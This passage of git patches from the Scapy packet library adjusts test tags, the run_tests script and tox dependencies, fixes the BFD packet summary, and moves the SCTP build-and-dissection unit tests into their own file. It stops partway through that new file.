"test\\contrib\\automotive\\gm\\*.uts", - "test\\contrib\\automotive\\bmw\\*.uts", - "test\\contrib\\automotive\\*.uts", - "tls\\tests_tls_netaccess.uts", - "contrib\\*.uts" - ], - "remove_testfiles": [ - "bpf.uts", - "linux.uts" - ], - "breakfailed": true, - "onlyfailed": true, - "preexec": { - "contrib\\*.uts": "load_contrib(\"%name%\")", - "cert.uts": "load_layer(\"tls\")", - "sslv2.uts": "load_layer(\"tls\")", - "tls*.uts": "load_layer(\"tls\")" - }, - "format": "html", - "kw_ko": [ - "osx", - "linux", - "crypto_advanced", - "mock_read_routes_bsd", - "appveyor_only", - "open_ssl_client", - "vcan_socket", - "ipv6", - "manufdb", - "tcpdump", - "tshark" - ] -} diff --git a/test/contrib/automotive/ccp.uts b/test/contrib/automotive/ccp.uts index 2fa8e29234e..db157728362 100644 --- a/test/contrib/automotive/ccp.uts +++ b/test/contrib/automotive/ccp.uts @@ -1,4 +1,5 @@ % Regression tests for the CCP layer +~ needs_root + Configuration ~ conf diff --git a/test/contrib/automotive/ecu_am.uts b/test/contrib/automotive/ecu_am.uts index a41f0b96f72..97246823641 100644 --- a/test/contrib/automotive/ecu_am.uts +++ b/test/contrib/automotive/ecu_am.uts @@ -1,4 +1,5 @@ % Regression tests for ECU_am +~ needs_root + Configuration ~ conf diff --git a/test/contrib/automotive/gm/gmlanutils.uts b/test/contrib/automotive/gm/gmlanutils.uts index c148986c444..69bd96113a1 100644 --- a/test/contrib/automotive/gm/gmlanutils.uts +++ b/test/contrib/automotive/gm/gmlanutils.uts @@ -1,4 +1,5 @@ % Regression tests for gmlanutil +~ needs_root + Configuration ~ conf diff --git a/test/contrib/automotive/obd/scanner.uts b/test/contrib/automotive/obd/scanner.uts index f9ba1fdb357..ae97295663f 100644 --- a/test/contrib/automotive/obd/scanner.uts +++ b/test/contrib/automotive/obd/scanner.uts @@ -1,4 +1,5 @@ % Regression tests for obd_scan +~ needs_root + Configuration ~ conf diff --git a/test/contrib/automotive/uds_utils.uts b/test/contrib/automotive/uds_utils.uts index 0d8cb162ec7..867740cf99f 100644 --- a/test/contrib/automotive/uds_utils.uts +++ b/test/contrib/automotive/uds_utils.uts @@ -1,4 +1,5 @@ % Regression tests for uds_utils +~ needs_root + Configuration ~ conf diff --git a/test/contrib/isotp.uts b/test/contrib/isotp.uts index 4ddd29c8b5a..2e126b52945 100644 --- a/test/contrib/isotp.uts +++ b/test/contrib/isotp.uts @@ -1,4 +1,5 @@ % Regression tests for ISOTP +~ needs_root + Configuration ~ conf diff --git a/test/regression.uts b/test/regression.uts index a39f1ce232e..23ac5b579c0 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -425,7 +425,7 @@ assert not get_var("z") os.remove("%s.dat" % session_name) = Test temporary file creation -~ appveyor_only +~ ci_only scapy_delete_temp_files() @@ -9100,6 +9100,7 @@ assert pl[1][Ether].dst == '00:22:33:44:55:66' + Scapy version = _version() +~ ci_only import os version_filename = os.path.join(scapy._SCAPY_PKG_DIR, "VERSION") diff --git a/test/run_tests b/test/run_tests index 1ca9beeb97f..b67219781cf 100755 --- a/test/run_tests +++ b/test/run_tests @@ -1,4 +1,18 @@ #! /bin/sh +# +# Run Scapy test suite. +# +# If ran with no arguments: +# ./run_tests +# this util will run the test suite using tox, with options that should work +# regardless of the platform or the dependencies. The only dependency for this +# to work are python3 (or python) and tox. +# +# If ran with arguments, this will call UTscapy.py +# +# ATTENTION PACKAGE MAINTAINERS: +# If you do need to run Scapy tests, calling ./run_tests should be enough. +# DIR=$(dirname "$0")/.. if [ -z "$PYTHON" ] then @@ -20,4 +34,28 @@ then echo "WARNING: '$PYTHON' not found, using 'python' instead." PYTHON=python fi + +if [ -z "$ARGS" ] +then + # No arguments specified: use tox + # We use flags to disable tests that use external non tox-installed + # software. + + # Check tox + tox --version >/dev/null 2>/dev/null + if [ ! $? -eq 0 ] + then + echo "ERROR: tox is not installed." + echo "You can still run ./run_tests with arguments: see ./run_tests -h" + echo "e.g. ./run_tests -t tls.uts -F" + exit 1 + fi + + # Run tox + export UT_FLAGS="-K tcpdump -K manufdb -K wireshark -K ci_only" + export SIMPLE_TESTS="true" + PYVER=$($PYTHON -c "import sys; print('.'.join(sys.version.split('.')[:2]))") + ${DIR}/.config/ci/test.sh $PYVER non_root + exit $? +fi PYTHONPATH=$DIR exec "$PYTHON" ${DIR}/scapy/tools/UTscapy.py $ARGS diff --git a/test/tls/tests_tls_netaccess.uts b/test/tls/tests_tls_netaccess.uts index 5efd379443c..0ac3ef9323e 100644 --- a/test/tls/tests_tls_netaccess.uts +++ b/test/tls/tests_tls_netaccess.uts @@ -348,6 +348,14 @@ test_tls_client("1305", "0304", key_update=True) test_tls_client("1305", "0304", client_auth=True, sess_in_out=True) += Clear session file + +file_sess = get_file("/test/session") +try: + os.remove(file_sess) +except: + pass + # Automaton as Socket tests + TLSAutomatonClient socket tests diff --git a/tox.ini b/tox.ini index 4112ce69a68..7b6ef6cc9fb 100644 --- a/tox.ini +++ b/tox.ini @@ -22,8 +22,9 @@ deps = mock cryptography coverage python-can - brotli>=1.0.0,!=1.0.8,!=1.0.9 - zstandard==0.14.0 + # disabled on windows because they require c++ dependencies + brotli ; sys_platform != 'win32' + zstandard ; sys_platform != 'win32' platform = linux_non_root,linux_root: linux bsd_non_root,bsd_root: darwin|freebsd|openbsd|netbsd From 594661baa7e5f9f312e7358f49a2ca5b1e62178e Mon Sep 17 00:00:00 2001 From: Christophe Fontaine Date: Tue, 3 Nov 2020 17:35:01 +0100 Subject: [PATCH 0377/1632] Fix contrib.bfd.BFD summary --- scapy/contrib/bfd.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/scapy/contrib/bfd.py b/scapy/contrib/bfd.py index 3cadaf6db70..f86abbad188 100644 --- a/scapy/contrib/bfd.py +++ b/scapy/contrib/bfd.py @@ -33,7 +33,8 @@ class BFD(Packet): def mysummary(self): return self.sprintf( "BFD (my_disc=%BFD.my_discriminator%," - "your_disc=%BFD.my_discriminator%)" + "your_disc=%BFD.your_discriminator%," + "state=%BFD.sta%)" ) From 1547444eb9a5fe1ce9545c8af068584e050c886c Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 4 Nov 2020 19:11:53 +0100 Subject: [PATCH 0378/1632] Standalone sctp unit tests Co-authored-by: Guillaume Valadon Co-authored-by: Gabriel Potter Co-authored-by: Lucas Pascal Co-authored-by: Pierre LALET --- test/regression.uts | 257 ------------------------------------ test/scapy/layers/sctp.uts | 260 +++++++++++++++++++++++++++++++++++++ 2 files changed, 260 insertions(+), 257 deletions(-) create mode 100644 test/scapy/layers/sctp.uts diff --git a/test/regression.uts b/test/regression.uts index 4fa15fcb74b..c876e5c3531 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -7506,263 +7506,6 @@ assert TCP(flags="SA").flags & TCP(flags="S").flags == TCP(flags="S").flags assert TCP(flags="SA").flags | TCP(flags="S").flags == TCP(flags="SA").flags -############ -############ -+ SCTP - -= SCTP - Chunk Init - build -s = raw(IP()/SCTP()/SCTPChunkInit(params=[SCTPChunkParamIPv4Addr()])) -s == b'E\x00\x00<\x00\x01\x00\x00@\x84|;\x7f\x00\x00\x01\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00@,\x0b_\x01\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x08\x7f\x00\x00\x01' - -= SCTP - Chunk Init - dissection -p = IP(s) -SCTPChunkParamIPv4Addr in p and p[SCTP].chksum == 0x402c0b5f and p[SCTPChunkParamIPv4Addr].addr == "127.0.0.1" - -= SCTP - SCTPChunkSACK - build -s = raw(IP()/SCTP()/SCTPChunkSACK(gap_ack_list=["7:28"])) -s == b'E\x00\x004\x00\x01\x00\x00@\x84|C\x7f\x00\x00\x01\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00;\x01\xd4\x04\x03\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x07\x00\x1c' - -= SCTP - SCTPChunkSACK - dissection -p = IP(s) -SCTPChunkSACK in p and p[SCTP].chksum == 0x3b01d404 and p[SCTPChunkSACK].gap_ack_list[0] == "7:28" - -= SCTP - answers -(IP()/SCTP()).answers(IP()/SCTP()) == True - -= SCTP basic header - Dissection -~ sctp -blob = b"\x1A\x85\x26\x94\x00\x00\x00\x0D\x00\x00\x04\xD2" -p = SCTP(blob) -assert(p.dport == 9876) -assert(p.sport == 6789) -assert(p.tag == 13) -assert(p.chksum == 1234) - -= basic SCTPChunkData - Dissection -~ sctp -blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x64\x61\x74\x61" -p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkData)) -assert(p.reserved == 0) -assert(p.delay_sack == 0) -assert(p.unordered == 0) -assert(p.beginning == 0) -assert(p.ending == 0) -assert(p.tsn == 0) -assert(p.stream_id == 0) -assert(p.stream_seq == 0) -assert(p.len == (len("data") + 16)) -assert(p.data == b"data") - -= basic SCTPChunkInit - Dissection -~ sctp -blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkInit)) -assert(p.flags == 0) -assert(p.len == 20) -assert(p.init_tag == 0) -assert(p.a_rwnd == 0) -assert(p.n_out_streams == 0) -assert(p.n_in_streams == 0) -assert(p.init_tsn == 0) -assert(p.params == []) - -= SCTPChunkInit multiple valid parameters - Dissection -~ sctp -blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x5C\x00\x00\x00\x65\x00\x00\x00\x66\x00\x67\x00\x68\x00\x00\x00\x69\x00\x0C\x00\x06\x00\x05\x00\x00\x80\x00\x00\x04\xC0\x00\x00\x04\x80\x08\x00\x07\x0F\xC1\x80\x00\x80\x03\x00\x04\x80\x02\x00\x24\x87\x77\x21\x29\x3F\xDA\x62\x0C\x06\x6F\x10\xA5\x39\x58\x60\x98\x4C\xD4\x59\xD8\x8A\x00\x85\xFB\x9E\x2E\x66\xBA\x3A\x23\x54\xEF\x80\x04\x00\x06\x00\x01\x00\x00" -p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkInit)) -assert(p.flags == 0) -assert(p.len == 92) -assert(p.init_tag == 101) -assert(p.a_rwnd == 102) -assert(p.n_out_streams == 103) -assert(p.n_in_streams == 104) -assert(p.init_tsn == 105) -assert(len(p.params) == 7) -params = {type(param): param for param in p.params} -assert(set(params.keys()) == {SCTPChunkParamECNCapable, SCTPChunkParamFwdTSN, - SCTPChunkParamSupportedExtensions, SCTPChunkParamChunkList, - SCTPChunkParamRandom, SCTPChunkParamRequestedHMACFunctions, - SCTPChunkParamSupportedAddrTypes}) -assert(params[SCTPChunkParamECNCapable] == SCTPChunkParamECNCapable()) -assert(params[SCTPChunkParamFwdTSN] == SCTPChunkParamFwdTSN()) -assert(params[SCTPChunkParamSupportedExtensions] == SCTPChunkParamSupportedExtensions(len=7)) -assert(params[SCTPChunkParamChunkList] == SCTPChunkParamChunkList(len=4)) -assert(params[SCTPChunkParamRandom].len == 4+32) -assert(len(params[SCTPChunkParamRandom].random) == 32) -assert(params[SCTPChunkParamRequestedHMACFunctions] == SCTPChunkParamRequestedHMACFunctions(len=6)) -assert(params[SCTPChunkParamSupportedAddrTypes] == SCTPChunkParamSupportedAddrTypes(len=6)) - -= basic SCTPChunkInitAck - Dissection -~ sctp -blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkInitAck)) -assert(p.flags == 0) -assert(p.len == 20) -assert(p.init_tag == 0) -assert(p.a_rwnd == 0) -assert(p.n_out_streams == 0) -assert(p.n_in_streams == 0) -assert(p.init_tsn == 0) -assert(p.params == []) - -= SCTPChunkInitAck with state cookie - Dissection -~ sctp -blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x4C\x00\x00\x00\x65\x00\x00\x00\x66\x00\x67\x00\x68\x00\x00\x00\x69\x80\x00\x00\x04\x00\x0B\x00\x0D\x6C\x6F\x63\x61\x6C\x68\x6F\x73\x74\x00\x00\x00\xC0\x00\x00\x04\x80\x08\x00\x07\x0F\xC1\x80\x00\x00\x07\x00\x14\x00\x10\x9E\xB2\x86\xCE\xE1\x7D\x0F\x6A\xAD\xFD\xB3\x5D\xBC\x00" -p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkInitAck)) -assert(p.flags == 0) -assert(p.len == 76) -assert(p.init_tag == 101) -assert(p.a_rwnd == 102) -assert(p.n_out_streams == 103) -assert(p.n_in_streams == 104) -assert(p.init_tsn == 105) -assert(len(p.params) == 5) -params = {type(param): param for param in p.params} -assert(set(params.keys()) == {SCTPChunkParamECNCapable, SCTPChunkParamHostname, - SCTPChunkParamFwdTSN, SCTPChunkParamSupportedExtensions, - SCTPChunkParamStateCookie}) -assert(params[SCTPChunkParamECNCapable] == SCTPChunkParamECNCapable()) -assert(raw(params[SCTPChunkParamHostname]) == raw(SCTPChunkParamHostname(len=13, hostname="localhost"))) -assert(params[SCTPChunkParamFwdTSN] == SCTPChunkParamFwdTSN()) -assert(params[SCTPChunkParamSupportedExtensions] == SCTPChunkParamSupportedExtensions(len=7)) -assert(params[SCTPChunkParamStateCookie].len == 4+16) -assert(len(params[SCTPChunkParamStateCookie].cookie) == 16) - -= basic SCTPChunkSACK - Dissection -~ sctp -blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkSACK)) -assert(p.flags == 0) -assert(p.len == 16) -assert(p.cumul_tsn_ack == 0) -assert(p.a_rwnd == 0) -assert(p.n_gap_ack == 0) -assert(p.n_dup_tsn == 0) -assert(p.gap_ack_list == []) -assert(p.dup_tsn_list == []) - -= basic SCTPChunkHeartbeatReq - Dissection -~ sctp -blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x04" -p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkHeartbeatReq)) -assert(p.flags == 0) -assert(p.len == 4) -assert(p.params == []) - -= basic SCTPChunkHeartbeatAck - Dissection -~ sctp -blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x04" -p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkHeartbeatAck)) -assert(p.flags == 0) -assert(p.len == 4) -assert(p.params == []) - -= basic SCTPChunkAbort - Dissection -~ sctp -blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x04" -p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkAbort)) -assert(p.reserved == 0) -assert(p.TCB == 0) -assert(p.len == 4) -assert(p.error_causes == b"") - -= basic SCTPChunkShutDown - Dissection -~ sctp -blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x08\x00\x00\x00\x00" -p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkShutdown)) -assert(p.flags == 0) -assert(p.len == 8) -assert(p.cumul_tsn_ack == 0) - -= basic SCTPChunkShutDownAck - Dissection -~ sctp -blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x04" -p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkShutdownAck)) -assert(p.flags == 0) -assert(p.len == 4) - -= basic SCTPChunkError - Dissection -~ sctp -blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x04" -p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkError)) -assert(p.flags == 0) -assert(p.len == 4) -assert(p.error_causes == b"") - -= basic SCTPChunkCookieEcho - Dissection -~ sctp -blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0A\x00\x00\x04" -p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkCookieEcho)) -assert(p.flags == 0) -assert(p.len == 4) -assert(p.cookie == b"") - -= basic SCTPChunkCookieAck - Dissection -~ sctp -blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0B\x00\x00\x04" -p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkCookieAck)) -assert(p.flags == 0) -assert(p.len == 4) - -= basic SCTPChunkShutdownComplete - Dissection -~ sctp -blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0E\x00\x00\x04" -p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkShutdownComplete)) -assert(p.reserved == 0) -assert(p.TCB == 0) -assert(p.len == 4) - -= basic SCTPChunkAuthentication - Dissection -~ sctp -blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x08\x00\x00\x00\x00" -p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkAuthentication)) -assert(p.flags == 0) -assert(p.len == 8) -assert(p.shared_key_id == 0) -assert(p.HMAC_function == 0) - -= basic SCTPChunkAddressConf - Dissection -~ sctp -blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc1\x00\x00\x08\x00\x00\x00\x00" -p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkAddressConf)) -assert(p.flags == 0) -assert(p.len == 8) -assert(p.seq == 0) -assert(p.params == []) - -= basic SCTPChunkAddressConfAck - Dissection -~ sctp -blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x08\x00\x00\x00\x00" -p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkAddressConfAck)) -assert(p.flags == 0) -assert(p.len == 8) -assert(p.seq == 0) -assert(p.params == []) - -= SCTPChunkParamRandom - Consecutive calls -~ sctp -param1, param2 = SCTPChunkParamRandom(), SCTPChunkParamRandom() -assert(param1.random != param2.random) - - ############ ############ + 802.3 diff --git a/test/scapy/layers/sctp.uts b/test/scapy/layers/sctp.uts new file mode 100644 index 00000000000..d0c3114a640 --- /dev/null +++ b/test/scapy/layers/sctp.uts @@ -0,0 +1,260 @@ +% SCTP regression tests for Scapy + +# More information at http://www.secdev.org/projects/UTscapy/ + + +############ +############ ++ SCTP + += SCTP - Chunk Init - build +s = raw(IP()/SCTP()/SCTPChunkInit(params=[SCTPChunkParamIPv4Addr()])) +s == b'E\x00\x00<\x00\x01\x00\x00@\x84|;\x7f\x00\x00\x01\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00@,\x0b_\x01\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x08\x7f\x00\x00\x01' + += SCTP - Chunk Init - dissection +p = IP(s) +SCTPChunkParamIPv4Addr in p and p[SCTP].chksum == 0x402c0b5f and p[SCTPChunkParamIPv4Addr].addr == "127.0.0.1" + += SCTP - SCTPChunkSACK - build +s = raw(IP()/SCTP()/SCTPChunkSACK(gap_ack_list=["7:28"])) +s == b'E\x00\x004\x00\x01\x00\x00@\x84|C\x7f\x00\x00\x01\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00;\x01\xd4\x04\x03\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x07\x00\x1c' + += SCTP - SCTPChunkSACK - dissection +p = IP(s) +SCTPChunkSACK in p and p[SCTP].chksum == 0x3b01d404 and p[SCTPChunkSACK].gap_ack_list[0] == "7:28" + += SCTP - answers +(IP()/SCTP()).answers(IP()/SCTP()) == True + += SCTP basic header - Dissection +~ sctp +blob = b"\x1A\x85\x26\x94\x00\x00\x00\x0D\x00\x00\x04\xD2" +p = SCTP(blob) +assert(p.dport == 9876) +assert(p.sport == 6789) +assert(p.tag == 13) +assert(p.chksum == 1234) + += basic SCTPChunkData - Dissection +~ sctp +blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x64\x61\x74\x61" +p = SCTP(blob).lastlayer() +assert(isinstance(p, SCTPChunkData)) +assert(p.reserved == 0) +assert(p.delay_sack == 0) +assert(p.unordered == 0) +assert(p.beginning == 0) +assert(p.ending == 0) +assert(p.tsn == 0) +assert(p.stream_id == 0) +assert(p.stream_seq == 0) +assert(p.len == (len("data") + 16)) +assert(p.data == b"data") + += basic SCTPChunkInit - Dissection +~ sctp +blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +p = SCTP(blob).lastlayer() +assert(isinstance(p, SCTPChunkInit)) +assert(p.flags == 0) +assert(p.len == 20) +assert(p.init_tag == 0) +assert(p.a_rwnd == 0) +assert(p.n_out_streams == 0) +assert(p.n_in_streams == 0) +assert(p.init_tsn == 0) +assert(p.params == []) + += SCTPChunkInit multiple valid parameters - Dissection +~ sctp +blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x5C\x00\x00\x00\x65\x00\x00\x00\x66\x00\x67\x00\x68\x00\x00\x00\x69\x00\x0C\x00\x06\x00\x05\x00\x00\x80\x00\x00\x04\xC0\x00\x00\x04\x80\x08\x00\x07\x0F\xC1\x80\x00\x80\x03\x00\x04\x80\x02\x00\x24\x87\x77\x21\x29\x3F\xDA\x62\x0C\x06\x6F\x10\xA5\x39\x58\x60\x98\x4C\xD4\x59\xD8\x8A\x00\x85\xFB\x9E\x2E\x66\xBA\x3A\x23\x54\xEF\x80\x04\x00\x06\x00\x01\x00\x00" +p = SCTP(blob).lastlayer() +assert(isinstance(p, SCTPChunkInit)) +assert(p.flags == 0) +assert(p.len == 92) +assert(p.init_tag == 101) +assert(p.a_rwnd == 102) +assert(p.n_out_streams == 103) +assert(p.n_in_streams == 104) +assert(p.init_tsn == 105) +assert(len(p.params) == 7) +params = {type(param): param for param in p.params} +assert(set(params.keys()) == {SCTPChunkParamECNCapable, SCTPChunkParamFwdTSN, + SCTPChunkParamSupportedExtensions, SCTPChunkParamChunkList, + SCTPChunkParamRandom, SCTPChunkParamRequestedHMACFunctions, + SCTPChunkParamSupportedAddrTypes}) +assert(params[SCTPChunkParamECNCapable] == SCTPChunkParamECNCapable()) +assert(params[SCTPChunkParamFwdTSN] == SCTPChunkParamFwdTSN()) +assert(params[SCTPChunkParamSupportedExtensions] == SCTPChunkParamSupportedExtensions(len=7)) +assert(params[SCTPChunkParamChunkList] == SCTPChunkParamChunkList(len=4)) +assert(params[SCTPChunkParamRandom].len == 4+32) +assert(len(params[SCTPChunkParamRandom].random) == 32) +assert(params[SCTPChunkParamRequestedHMACFunctions] == SCTPChunkParamRequestedHMACFunctions(len=6)) +assert(params[SCTPChunkParamSupportedAddrTypes] == SCTPChunkParamSupportedAddrTypes(len=6)) + += basic SCTPChunkInitAck - Dissection +~ sctp +blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +p = SCTP(blob).lastlayer() +assert(isinstance(p, SCTPChunkInitAck)) +assert(p.flags == 0) +assert(p.len == 20) +assert(p.init_tag == 0) +assert(p.a_rwnd == 0) +assert(p.n_out_streams == 0) +assert(p.n_in_streams == 0) +assert(p.init_tsn == 0) +assert(p.params == []) + += SCTPChunkInitAck with state cookie - Dissection +~ sctp +blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x4C\x00\x00\x00\x65\x00\x00\x00\x66\x00\x67\x00\x68\x00\x00\x00\x69\x80\x00\x00\x04\x00\x0B\x00\x0D\x6C\x6F\x63\x61\x6C\x68\x6F\x73\x74\x00\x00\x00\xC0\x00\x00\x04\x80\x08\x00\x07\x0F\xC1\x80\x00\x00\x07\x00\x14\x00\x10\x9E\xB2\x86\xCE\xE1\x7D\x0F\x6A\xAD\xFD\xB3\x5D\xBC\x00" +p = SCTP(blob).lastlayer() +assert(isinstance(p, SCTPChunkInitAck)) +assert(p.flags == 0) +assert(p.len == 76) +assert(p.init_tag == 101) +assert(p.a_rwnd == 102) +assert(p.n_out_streams == 103) +assert(p.n_in_streams == 104) +assert(p.init_tsn == 105) +assert(len(p.params) == 5) +params = {type(param): param for param in p.params} +assert(set(params.keys()) == {SCTPChunkParamECNCapable, SCTPChunkParamHostname, + SCTPChunkParamFwdTSN, SCTPChunkParamSupportedExtensions, + SCTPChunkParamStateCookie}) +assert(params[SCTPChunkParamECNCapable] == SCTPChunkParamECNCapable()) +assert(raw(params[SCTPChunkParamHostname]) == raw(SCTPChunkParamHostname(len=13, hostname="localhost"))) +assert(params[SCTPChunkParamFwdTSN] == SCTPChunkParamFwdTSN()) +assert(params[SCTPChunkParamSupportedExtensions] == SCTPChunkParamSupportedExtensions(len=7)) +assert(params[SCTPChunkParamStateCookie].len == 4+16) +assert(len(params[SCTPChunkParamStateCookie].cookie) == 16) + += basic SCTPChunkSACK - Dissection +~ sctp +blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +p = SCTP(blob).lastlayer() +assert(isinstance(p, SCTPChunkSACK)) +assert(p.flags == 0) +assert(p.len == 16) +assert(p.cumul_tsn_ack == 0) +assert(p.a_rwnd == 0) +assert(p.n_gap_ack == 0) +assert(p.n_dup_tsn == 0) +assert(p.gap_ack_list == []) +assert(p.dup_tsn_list == []) + += basic SCTPChunkHeartbeatReq - Dissection +~ sctp +blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x04" +p = SCTP(blob).lastlayer() +assert(isinstance(p, SCTPChunkHeartbeatReq)) +assert(p.flags == 0) +assert(p.len == 4) +assert(p.params == []) + += basic SCTPChunkHeartbeatAck - Dissection +~ sctp +blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x04" +p = SCTP(blob).lastlayer() +assert(isinstance(p, SCTPChunkHeartbeatAck)) +assert(p.flags == 0) +assert(p.len == 4) +assert(p.params == []) + += basic SCTPChunkAbort - Dissection +~ sctp +blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x04" +p = SCTP(blob).lastlayer() +assert(isinstance(p, SCTPChunkAbort)) +assert(p.reserved == 0) +assert(p.TCB == 0) +assert(p.len == 4) +assert(p.error_causes == b"") + += basic SCTPChunkShutDown - Dissection +~ sctp +blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x08\x00\x00\x00\x00" +p = SCTP(blob).lastlayer() +assert(isinstance(p, SCTPChunkShutdown)) +assert(p.flags == 0) +assert(p.len == 8) +assert(p.cumul_tsn_ack == 0) + += basic SCTPChunkShutDownAck - Dissection +~ sctp +blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x04" +p = SCTP(blob).lastlayer() +assert(isinstance(p, SCTPChunkShutdownAck)) +assert(p.flags == 0) +assert(p.len == 4) + += basic SCTPChunkError - Dissection +~ sctp +blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x04" +p = SCTP(blob).lastlayer() +assert(isinstance(p, SCTPChunkError)) +assert(p.flags == 0) +assert(p.len == 4) +assert(p.error_causes == b"") + += basic SCTPChunkCookieEcho - Dissection +~ sctp +blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0A\x00\x00\x04" +p = SCTP(blob).lastlayer() +assert(isinstance(p, SCTPChunkCookieEcho)) +assert(p.flags == 0) +assert(p.len == 4) +assert(p.cookie == b"") + += basic SCTPChunkCookieAck - Dissection +~ sctp +blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0B\x00\x00\x04" +p = SCTP(blob).lastlayer() +assert(isinstance(p, SCTPChunkCookieAck)) +assert(p.flags == 0) +assert(p.len == 4) + += basic SCTPChunkShutdownComplete - Dissection +~ sctp +blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0E\x00\x00\x04" +p = SCTP(blob).lastlayer() +assert(isinstance(p, SCTPChunkShutdownComplete)) +assert(p.reserved == 0) +assert(p.TCB == 0) +assert(p.len == 4) + += basic SCTPChunkAuthentication - Dissection +~ sctp +blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x08\x00\x00\x00\x00" +p = SCTP(blob).lastlayer() +assert(isinstance(p, SCTPChunkAuthentication)) +assert(p.flags == 0) +assert(p.len == 8) +assert(p.shared_key_id == 0) +assert(p.HMAC_function == 0) + += 